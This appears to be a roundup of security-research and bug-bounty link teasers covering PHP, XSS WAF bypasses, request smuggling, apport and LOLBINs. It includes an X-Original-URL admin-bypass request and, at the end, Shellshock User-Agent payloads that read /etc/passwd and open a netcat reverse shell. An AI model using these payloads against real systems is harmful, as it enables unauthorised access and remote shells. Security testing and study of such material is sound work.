Applications still utilize weak cryptography generation methodologies which may lead to severe risk. In the world of Application Security, looking for a…

A fast & light web screenshot without headless browser but Chrome DevTools Protocol! - dwisiswant0/go-stare

TL;DR Find out how a use after free vulnerability in PHP allows attackers that are able to run PHP code to escape disable_functions restrictions. Vulnerability Summary PHP’s SplDoublyLinkedList is vulnerable to an UAF since it has been added to PHP’s core…

Testing for XSS via “javascript:” but it’s blocked by a WAF? Try these bypasses. Thanks for the #BugBountyTip, @SecurityMB! #BugBountyTips #HackWithIntigriti

by Worawit Wangwarunyoo , DATAFARM Research Team, Datafarm Company Limited

TL;DR: This is how I was able to exploit a HTTP Request Smuggling in a Mobile Device Management (MDM) servers and send any MDM command to…

GET /admin HTTP/1.1 Host: https://t.co/kc0BFkaTX3 ... Access is denied GET /test HTTP/1.1 Host: https://t.co/kc0BFkaTX3 X-Original-URL: /admin HTTP/1.1 200 OK

How my name was added to humans.txt for scoring my first bug bounty, a severity 2 one at that!

open redirect to a complete account takeover

Burp Extension for easily creating Wordlists. Contribute to GainSec/GoldenNuggets-1 development by creating an account on GitHub.

Understanding “rundll32.exe” command line arguments

This is the third post in a series about Ubuntu’s crash reporting system. We’ll review CVE-2019-15790, a vulnerability in apport that enables a local attacker to obtain the ASLR offsets for any process they can start (or restart).

Its been a few months since my last post about uploading and downloading data with certreq.exe as a potential alternative to certutil.exe in LOLBIN land. I've been having a blast starting my new role in the MDSec ActiveBreach team.

Today I wanted to share…

Test on CGI (cgi-bin) User-Agent: () { :;}; echo $(</etc/passwd) () { :;}; /usr/bin/nc ip 1337 -e /bin/bash